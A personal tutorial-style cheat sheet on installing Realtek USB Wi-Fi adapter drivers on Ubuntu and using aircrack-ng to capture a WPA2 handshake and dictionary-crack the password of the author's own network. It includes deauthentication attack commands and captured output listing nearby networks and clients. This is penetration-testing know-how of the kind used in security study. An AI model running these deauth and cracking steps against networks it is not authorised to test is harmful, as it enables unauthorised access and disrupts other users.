These notes are more of a massive cheat sheet for me for Wifi connectivity and Wifi SSID / password cracking.
To do “wifi password hacking”, you need a special Wifi adapter that supports monitor + injection mode. Links are provided in the 2nd code block of some tested adapters. Personally, I tested both of these and can attest to it. I happen to have 2 of them AWUS036ACS and QGOO 1750 Mbps.
AWUS036ACS
QGOO 1750 Mbps
The first code block is how to install drivers for AWUS036ACS wifi adapter
The second code block is how to install drivers for QGOO 1750 Mbps wifi adapter and how to use aircrack-ng to crack WPA passwords, additionally some other wifi cheatsheet commands are given to help out wifi connectivity. (ignore all of the chown / chmods; thats because I accidentally used root to create files inside of a none root directory, so I wanted to fix those).
Note: you will most likely have an internal wifi card on your laptop (that connects to the internet) and the external USB wifi adapter that does the “aircrack”ing. While using aircrack you can not use your internal wifi card, as processes are killed that connect you to the internet. However, after you are done “aircracking” you run a command that reestablishes your internet connectivity.
Code block 1 – Installing Driver for AWUS036ACS (uses 8812au or 88XXau module)
Wifi Cracking on Ubuntu with AWUS036ACS ########################################### Install the driver/module for the AWUS036ACS with this guide: * https://avabodha.in/install-driver-for-alfa-awus036acs-on-linux/ (old none DKMS method) * https://amigotechnotes.wordpress.com/2020/04/27/build-the-linux-kernel-module-to-enable-rtl8812au-usb-wireless-dongles/ (DKMS method; better) SIDENOTE0: Do not worry about the content of those links as I have restated the important information and commands into this article. To summarize: $ sudo su $ lshw -c network -businfo # missing $ iw dev # nothing $ lsusb Bus 003 Device 027: ID 0bda:0811 Realtek Semiconductor Corp. Realtek 8812AU/8821AU 802.11ac WLAN Adapter [USB Wireless Dual-Band Adapter 2.4/5Ghz] $ git clone https://github.com/aircrack-ng/rtl8812au.git $ cd ~/rtl8812au $ sudo make dkms_install # compile and install module via DKMS $ sudo modprobe 88XXau # this command is optional, just to test that it works. when you plug in the device it will auto load this SIDENOTE: here is how you can compile the original way without DKMS. This method is not as nice because if your kernel updates, you will lose this module and will need to remember to manually recompile. DKMS on the other hand automatically recompiles modules each time a kernel is installed. $ cd rtl8812au $ make 88XXau.ko $ make install $ sudo modprobe 88XXau # this command is optional, just to test that it works. when you plug in the device it will auto load this End of SIDENOTE SIDENOTE2: when you install with DKMS the modules go $ find /lib/ | grep 88XXau.ko /lib/modules/5.15.0-46-generic/kernel/drivers/net/wireless/88XXau.ko <----compiled on my old kernel with original method /lib/modules/5.15.0-47-generic/updates/dkms/88XXau.ko <-- updated kernel and lost module so I recompiled with dkms and now with future kernel update this module will automatically recompile (see SIDENOTE in Code Block 2 to see how DKMS recompiled the other driver for me it for me) unplug and plug back in you will see lights on it now and you will see it in $ airmon-ng PHY Interface Driver Chipset phy0 wlp0s20f3 iwlwifi 14.3 Network controller: Intel Corporation Wi-Fi 6 AX201 (rev 20) phy5 wlx00c0cab16620 88XXau Realtek Semiconductor Corp. Realtek 8812AU/8821AU 802.11ac WLAN Adapter [USB Wireless Dual-Band Adapter 2.4/5Ghz]
Code Block 2 – Installing Drivers for QGOO 1750 Mbps, aircracking to get wifi password, and cheatsheet on connections (uses the 8814au module)
Wifi Cracking On Ubuntu With QGOO 1750 Mbps
###############################################
GOOD SOURCES:
===============
* https://www.wikihow.com/Hack-WPA/WPA2-Wi-Fi-with-Kali-Linux # how to crack with aircrack tools
* https://miloserdov.org/?p=4819 # good cheatsheet of commands
* https://miloserdov.org/?p=5493 # how to install the driver for this RTL8814AU wifi adapter (most of the content in section below)
* https://www.ceos3c.com/security/best-wifi-adapter-for-kali-linux/ # good devices to inject / monitor with
NOTE ON DRIVER rtl8814au INSTALLATION:
========================================
As I have kernel 5.15 or above. I scrolled to section in the article: Installing driver on Linux kernel >= 5.15. Below I will recap both older and newer kernel.
Installing deps
-----------------
However, before that must follow the previous section to install the dependencies:
sudo su # so you dont have to keep doing su for the driver installs
$ apt update
$ apt install git build-essential libelf-dev linux-headers-`uname -r` debhelper dpkg-dev dkms bc
Kernel older than 5.15:
------------------------------
$ git clone https://github.com/aircrack-ng/rtl8814au
$ cd rtl8814au
$ make dkms_install
$ dkms status
rtl8814au/5.8.5.1, 5.15.0-46-generic, x86_64: installed
8812au/5.6.4.2_35491.20191025, 5.15.0-46-generic, x86_64: installed <-- might also see this if you compiled the other kernel via DKMS (from CodeBlock 1)
SIDENOTE: With DKMS the kernels install into this dkms directory inside of lib. Also when the kernel updates, it automatically recompiles the module for the new kernel (without any manual intervention). Now when you boot into the new kernel this module will work. You can see that below.
$ find /lib/ | grep 8814au.ko
/lib/modules/5.15.0-46-generic/updates/dkms/8814au.ko <-- this is my originally installed module
/lib/modules/5.15.0-47-generic/updates/dkms/8814au.ko <-- I updated the kernel and this was automatically compiled for me
Kernel 5.15 and higher:
---------------------------
git clone https://github.com/morrownr/8814au
cd 8814au
./install-driver.sh
MY DEVICES AND INSTALLING IT:
===============================
MY PC:
Lenova 7420
Ubuntu 22.04
Kernel 5.15-0-46-generic
INSTALLING AIRCRACK ON UBUNTU:
$ apt-get install forensics-all
WIFI ADAPTER:
We basically need a wifi adapter (USB or PCI / internal) that can do injection and monitor mode. The ones I mentioned in this article (QGOO 1750 Mbps) although bulky gets the job done. My internal one that came with the laptop cannot do this (wlp0s20f3) as its chipset does not support this. I can put the internal into monitor mode, but its not able to do injection.
$ aireplay-ng -9 wlp0s20f3 # fails (internal)
$ aireplay-ng -9 wlx1cbfce7a56fa # success (QGOO 1750)
Output of airmon-ng showing the drives
$ airmon-ng
PHY Interface Driver Chipset
phy0 wlp0s20f3 iwlwifi 14.3 Network controller: Intel Corporation Wi-Fi 6 AX201 (rev 20)
phy6 wlx1cbfce7a56fa rtl8814au Realtek Semiconductor Corp. RTL8814AU 802.11a/b/g/n/ac
My device has QGOO 1750 on the front. I purchased it on Amazon.
Its based on the RTL8814AU driver, which according to
I googled how to install QGOO 1750 on linux, but that had outdated instructions so then I came up on link below
Plug in card make sure it shows up via
I had to install drivers (installed while secure boot is running)
I had to some reboots and set some MOK password (same as USER user password and my Lightbits main work password)
Still the interface did not show up
Finally, I had to "disable secure" in BIOS of my laptop and it worked.
Now it did show up as wlx1cbfce7a56fa
$ iw dev
phy#1
Interface wlx1cbfce7a56fa
ifindex 5
wdev 0x100000001
addr 1c:bf:ce:7a:56:fa
type monitor
txpower 20.00 dBm
phy#0
Interface wlp0s20f3
ifindex 2
wdev 0x1
addr a8:64:f1:6a:59:9b
type managed
txpower 22.00 dBm
multicast TXQ:
qsz-byt qsz-pkt flows drops marks overlmt hashcol tx-bytes tx-packets
0 0 0 0 0 0 0 0 0
we can also see it show up as USB
$ lshw -c network
$ lsusb
$ lspci
here is my lsusb output:
$ lsusb
Bus 004 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub
Bus 003 Device 003: ID 0a5c:5843 Broadcom Corp. 58200
Bus 003 Device 002: ID 1bcf:28cf Sunplus Innovation Technology Inc. Integrated_Webcam_FHD
Bus 003 Device 005: ID 0bda:8813 Realtek Semiconductor Corp. RTL8814AU 802.11a/b/g/n/ac Wireless Adapter <-- the adapter we will crack with
Bus 003 Device 004: ID 8087:0026 Intel Corp. AX201 Bluetooth
Bus 003 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 002 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub
Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
wlx1cbfce7a56fa is a eally long name so to make it easier I saved it to a file and variable
$ mkdir -p /home/USER/src/wifi/
/home/USER/src/wifi/int
$ cd /home/USER/src/wifi/
also
$ I=wlx1cbfce7a56fa
$ echo $I > int
so now I can refer to it as $I
$ iw dev # can see if monitor or managed mode
$ ip -br a # can see ip
when its scanning it looks like this by the way:
$ ip -br a
lo UNKNOWN 127.0.0.1/8 ::1/128
wlp0s20f3 DOWN
tailscale0 UNKNOWN 100.122.151.11/32 fd7a:115c:a1e0:ab12:4843:cd96:627a:970b/128 fe80::56cf:6f09:e1cd:215e/64
docker0 DOWN 172.17.0.1/16
wlx1cbfce7a56fa UP
$ iw dev
phy#1
Interface wlx1cbfce7a56fa
ifindex 5
wdev 0x100000001
addr 1c:bf:ce:7a:56:fa
type monitor
txpower 20.00 dBm
phy#0
Interface wlp0s20f3
ifindex 2
wdev 0x1
addr a8:64:f1:6a:59:9b
type managed
txpower 22.00 dBm
multicast TXQ:
qsz-byt qsz-pkt flows drops marks overlmt hashcol tx-bytes tx-packets
0 0 0 0 0 0 0 0 0
Note: above output shows the wifi adapter wlx1cbfce7a56fa in monitor mode but by default its in managed mode
Cracking Steps
================
TIP: you have to be root to run most of these commands and lots of them output files. So it was not a good idea to be inside /home/USER/src/ as everything it outputs saves as root:root. So after most steps, in order to keep my fs correct with permissions, I ran:
cd /home/USER/src/; chmod -R 755 .; chown USER:USER .
Step 1. Once Card is installed and detected lets begin.
Disconnect from Wifi all together (if you dont thats okay the next step will)
Step 2. First disabled monitor mod
$ airmon-ng
$ airmon-ng check kill
This disables processes that interfere
This will stop NetworkManager and you will notice the wifi icon in the top right of Ubuntu disapper (it will reappear if you start NetworkManager)
Step 3. set I variable to your interface for easy reference, lately wifi cards have lengthy names
$ I=wlx1cbfce7a56fa
so now to refer it in the bash I will just write $I
Step 4.
$ airodump-ng $I
Once the network shows up that we want (do not go for WPA3)
We want WPA or WPA2 or ENC
We need the BSSID and CH. The BSSID is the mac of the access point thats giving out that wifi signal. We can catch from the output of the command
We are looking for Sally 2.4
[] 7 ][ Elapsed: 54 s ][ 2022-08-14 23:32
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:25:00:FF:94:73 -1 0 0 0 -1 -1 <length: 0>
00:0D:97:00:CE:E2 -1 0 5 0 1 -1 WPA <length: 0>
40:3F:8C:FF:B6:F7 -65 127 75 0 8 260 WPA2 CCMP PSK 2.4 G Sovohn
5E:7D:7D:2C:3A:99 -68 25 0 0 11 260 WPA2 CCMP MGT <length: 0>
5E:7D:7D:2C:3A:9D -67 20 0 0 11 260 WPA2 CCMP PSK <length: 0>
5E:7D:7D:2C:3A:9F -68 13 0 0 11 260 WPA2 CCMP PSK <length: 0>
5C:7D:7D:2B:3A:9C -69 13 8 0 11 260 WPA2 CCMP PSK Sally 2.4
10:33:BF:70:E2:F3 -76 31 0 0 11 130 WPA2 CCMP PSK <length: 0>
10:33:BF:70:E2:F7 -79 14 0 0 11 130 WPA2 CCMP MGT <length: 0>
10:33:BF:70:E2:F2 -80 20 0 0 11 130 WPA2 CCMP PSK Xfinipee
10:33:BF:70:E2:F5 -80 24 0 0 11 130 WPA2 CCMP PSK <length: 0>
80:CC:9C:AA:9B:01 -81 69 2 0 1 720 WPA3 CCMP SAE Sally6e 2.4
80:CC:9C:AA:9B:02 -82 61 0 0 1 720 WPA3 CCMP SAE Sally6e All
00:0D:97:10:CE:BE -98 9 0 0 1 54e. OPN SVPMeterconnectWIFI
00:0D:97:00:CE:BE -83 6 3 0 1 54e. WPA2 CCMP PSK <length: 0>
BSSID STATION PWR Rate Lost Frames Notes Probes
00:25:00:FF:94:73 F6:BC:1C:30:C5:F2 -32 0 -12 52 6
00:0D:97:00:CE:E2 00:0D:97:00:CE:BE -67 0 -36e 0 5
(not associated) 62:10:9E:58:3C:5D -53 0 - 1 0 1
(not associated) 5C:7D:7D:2B:3A:9C -68 0 - 6 0 2
5C:7D:7D:2B:3A:9C E2:5A:DE:E3:7F:8E -50 0 - 6e 6 5
5C:7D:7D:2B:3A:9C BE:14:39:A3:55:56 -53 0 - 1 0 6
We want to crack Sally 2.4, here is that line:
5C:7D:7D:2B:3A:9C -69 13 8 0 11 260 WPA2 CCMP PSK Sally 2.4
The network I want to hack is my own "Sally 2.4" with BSSID "5C:7D:7D:2B:3A:9C" on channel 11.
We actually get the BSSID and channel and SSID from output of the command as well.
Step 5.
Remember we are inside the path /home/USER/src/wifi so pwd expands to that.
$ airodump-ng -c number --bssid xx:xx:xx:xx:xx:xx -w dump mon0
$ airodump-ng -c 11 --bssid 5C:7D:7D:2B:3A:9C -w dump $I
Note: this will generate files prefixed with the name dump into the current directory.
Note about where the capture will be dumped to: -w is basically the dump prefix. It will save a few files with that prefix. So if the "-w dump". It will created dump-01.cap, dump01.csv, and more into the current path. If you want it to go to a specific directory run it like this "-w /path/to/directory/dump". This will put alot of files with that start with the name "dump" in the directory /path/to/directory/
This will save a few files into this path.
Next output: we have to wait until a connection happens then we see WPA handshake. Or we can force a connection by doing a deauth attack, and then user will have to reauthenticate. Instead I just logged out on my Sally 2.4 and logged back in.
When we see "WPA handshake: " we can stop with Control ^C... See below
Sidenote: deauth to get handshake
--------------------------------------
Sidenote: in a real attack we cant just disconnect and reconnect, we have to wait or force like this:
We can do a Deauth attack by following the guide:
https://www.wikihow.com/Hack-WPA/WPA2-Wi-Fi-with-Kali-Linux
Step 2, 3 and 4
Deauth attacks do not disconnect
Incase you wanted to do the Step2,3,4 of deauthentication all you need to do is
- Wait for something to connecto the network. Once you see two BSSID addressed appear next to each other - one labelled BSSID (the wifi router) and the other named STATION (the computer or other device) - this means a client is connected. To force them into a handshake, youll now send them a deauth packets that kill their connection.
- Open a new terminal window. Make sure airodump-ng is still running in other terminal.
- Run this command $ aireplay-ng -0 2 -c STATION-BSSID -a NETWORK-BSSID mon0
- Sidenote: the wiki how article has the arguments backwards for -c and -a. If you try with their way, nothing happens, but with the above correction, it properly does a deauth.
- STATION-BSSID is the BSSID of the client that connected to the network
- NETWORK-BSSDID is the routers BSSID
- In my case it would be: aireplay-ng -0 2 -a STATION-BSSID -c 5C:7D:7D:2B:3A:9C $I
- Sidenote: since I did not try deauth I did not get STATION-BSSID, had I tried it, I would put some MAC there like 18:B9:05:D7:3C:AD
- For an end result of: aireplay-ng -0 2 -a 18:B9:05:D7:3C:AD -c 5C:7D:7D:2B:3A:9C $I
back to the steps - watching for handshake
-----------------------------------------------
output of $ airodump-ng -c 11 --bssid 5C:7D:7D:2B:3A:9C -w `pwd` $I
[ CH 11 ][ Elapsed: 1 min ][ 2022-08-14 23:36 ][ WPA handshake: 5C:7D:7D:2B:3A:9C
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
5C:7D:7D:2B:3A:9C -66 0 656 7088 49 11 260 WPA2 CCMP PSK Sally 2.4
BSSID STATION PWR Rate Lost Frames Notes Probes
5C:7D:7D:2B:3A:9C 4E:D4:B4:02:A2:AF -1 6e- 0 0 4
5C:7D:7D:2B:3A:9C BE:14:39:A3:55:56 -22 6e-24 0 2471
5C:7D:7D:2B:3A:9C 18:B9:05:D7:48:77 -35 6e- 6e 0 18
5C:7D:7D:2B:3A:9C F4:A4:75:85:1B:D2 -35 6e- 6e 2 5919 EAPOL
5C:7D:7D:2B:3A:9C E2:5A:DE:E3:7F:8E -38 6e- 6 0 20
5C:7D:7D:2B:3A:9C 48:E1:E9:4F:26:46 -39 6 - 6 0 16
5C:7D:7D:2B:3A:9C B4:E8:42:49:E7:72 -49 6e- 6e 0 27
5C:7D:7D:2B:3A:9C 18:B9:05:D9:27:29 -51 6e- 6e 881 63
5C:7D:7D:2B:3A:9C D4:AD:FC:38:04:6C -54 6e- 6e 0 8
5C:7D:7D:2B:3A:9C D4:AD:FC:31:F1:4E -63 6e- 6e 0 10
5C:7D:7D:2B:3A:9C DC:29:19:E2:93:5A -68 6e- 6e 0 41
5C:7D:7D:2B:3A:9C 18:B9:05:D7:3C:AD -67 6e- 1 0 13
5C:7D:7D:2B:3A:9C 00:5F:67:AE:71:3D -72 6e- 6 0 9
5C:7D:7D:2B:3A:9C B8:3E:59:0C:44:43 -76 6e- 6e 0 80
5C:7D:7D:2B:3A:9C 02:CA:AE:1A:76:F5 -78 6e- 6 0 64
5C:7D:7D:2B:3A:9C DC:29:19:E1:03:BD -85 0 - 6 1 10
Step 6. When you exit ^C you will see files in current path or parent path. Copy them to a seperate path to be tidy. I put them inside /home/USER/src/wifi/capture-*/ and cd into that path
$ cd /home/USER/src/wifi/capture-*/
Step 7. Do a cracking
Sidenote: you can download wordlist by googling "rockyou.txt", its 136MB in size
I did not see my password 823Sally in rockyou.txt so I put it in the middle of rockyou-mod.txt. Still I am curious if it will crack with just rockyou.txt. (spoiler alert, it did not crack, it must be in there exactly; so it does not do variations).
My lists are in /home/USER/src/lists/rockyou.txt and /home/USER/src/lists/rockyou-mod.txt
$ aircrack-ng -a2 -b NETWORK BSSID -w /usr/share/wordlists/rockyou.txt /root/Desktop/*.cap
$ aircrack-ng -a2 -b 5C:7D:7D:2B:3A:9C -w /home/USER/src/lists/rockyou.txt *.cap # failed as my PW was missing
$ aircrack-ng -a2 -b 5C:7D:7D:2B:3A:9C -w /home/USER/src/lists/rockyou-mod.txt *.cap # instant success as my PW was there close to the top
Step 8.
when done restore network connectivity
$ systemctl start NetworkManager
Cheatsheet on wifi connection
==============================
if you have issues re-establishing connectivity with your main wifi adapter (in our case its $wlan which is wlp0s20f3). Check if its up with:
$ ip -br a
If its not up, see if its in monitor mode on accident and bring it back to managed
$ iw dev
$ iwconfig mode $wlan mode managed # sidenote: running "iwconfig mode $wlan mode monitor" is another way to get the adapter to be in monitor mode. Other ways are with iw or airmon-ng <start/stop> $wlan
or
$ iw $wlan set type managed # sidenote: for monitor mode iw $I1 set monitor control
$ ifconfig $wlan up # sidenote: change "up" to bring it "down". also can use: ip link set $wlan <up/down>
$ iw $wlan link # see if its connected to the SSID
Can force a connection
$ iw $wlan scan | grep SSID # scan SSID
Connect wifi with no password
$ iw dev $wlan connect -w "SSID-with-no-password"
Connect wifi with WEP
$ ifconfig $wlan down
$ iwconfig $wlan key "WEPpassword"
$ ifconfig $wlan up
$ iwconfig $wlan essid "SSID"
$ iwconfig $wlan ap 00:AA:BB:CC:11:22:33:44 # put in MAC of the AP
$ iwconfig $wlan ap any # if dont know AP mac
Connect wifi with WPA
$ wpa_passphrase SSID_NAME PASSWORD > conf
$ wpa_supplicant -B -i $wlan -c conf
Get dhcp
$ dhclient $wlan
troubleshooting: if rf is blocked run
$ rfkill list # to list
$ rfkill unblock # unblocks all rf <-- try this if cant connect
$ rfkill block all # blocks all rf